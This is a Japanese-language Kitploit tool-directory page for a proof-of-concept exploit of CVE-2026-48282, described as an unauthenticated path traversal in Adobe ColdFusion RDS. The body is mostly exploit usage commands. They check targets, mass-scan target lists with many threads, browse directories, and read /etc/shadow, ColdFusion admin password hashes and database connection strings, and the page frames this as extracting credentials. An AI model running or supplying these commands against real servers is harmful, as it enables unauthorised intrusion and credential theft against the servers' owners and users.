Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-48282 — CVE-2026-48282の概念実証エクスプロイト。Adobe ColdFusion RDSの重大なパストラバーサルにより、認証なしのファイル読み取り/書き込みおよびRCEを可能にします。単一ターゲットおよびマルチスレッドファイル抽出による大量スキャンをサポートします。 | Kitploit
ツール/GitHubGitHub/imbas007/cve-2026-48282
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubimbas007/cve-2026-48282

CVE-2026-48282

CVE-2026-48282の概念実証エクスプロイト。Adobe ColdFusion RDSの重大なパストラバーサルにより、認証なしのファイル読み取り/書き込みおよびRCEを可能にします。単一ターゲットおよびマルチスレッドファイル抽出による大量スキャンをサポートします。

リポジトリを見る
2462ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-48282-POC

CVE-2026-48282 は Adobe ColdFusion の Remote Development Service (RDS) における パストラバーサル (Path Traversal) 脆弱性であり、CVSS スコアは 10.0 (Critical) です。この脆弱性により、認証されていない攻撃者が /CFIDE/main/ide.cfm エンドポイントを介して任意のファイルの読み取りおよび書き込みを行い、リモートコード実行 (RCE) に至る可能性があります。

インストール

root@kitploit:~
# Clone the repository
git clone https://github.com/<username>/CVE-2026-48282.git
cd CVE-2026-48282

# Install dependencies (only requires `requests`)
pip install -r requirements.txt

使い方

単一ターゲット (-t)

root@kitploit:~
# Check vulnerability
python cve-2026-48282.py -t https://target.com --check

# Read files
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read "C:\\Windows\\win.ini"
python cve-2026-48282.py -t https://target.com --read "C:\\ColdFusion2023\\cfusion\\lib\\password.properties"

# Browse directories
python cve-2026-48282.py -t https://target.com --browse "C:\\"
python cve-2026-48282.py -t https://target.com --browse "C:\\inetpub\\wwwroot"

リストモード (-l) — 複数ターゲットのスキャン

root@kitploit:~

# Basic mass scan
python cve-2026-48282.py -l targets.txt --check

# More threads + save results
python cve-2026-48282.py -l targets.txt --check --threads 30 -o vuln.txt

# Scan + auto-read canary file on any vulnerable target found
python cve-2026-48282.py -l targets.txt --check --read "C:\\Windows\\win.ini" -o results.txt

機密ファイルの読み取り

root@kitploit:~

Once confirmed vulnerable, extract credentials and configuration:

# ColdFusion admin password hash
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\password.properties"

# Database connection strings (neo-query.xml)
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\neo-query.xml"

# Linux targets
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read /etc/shadow

画像
ツールをダウンロード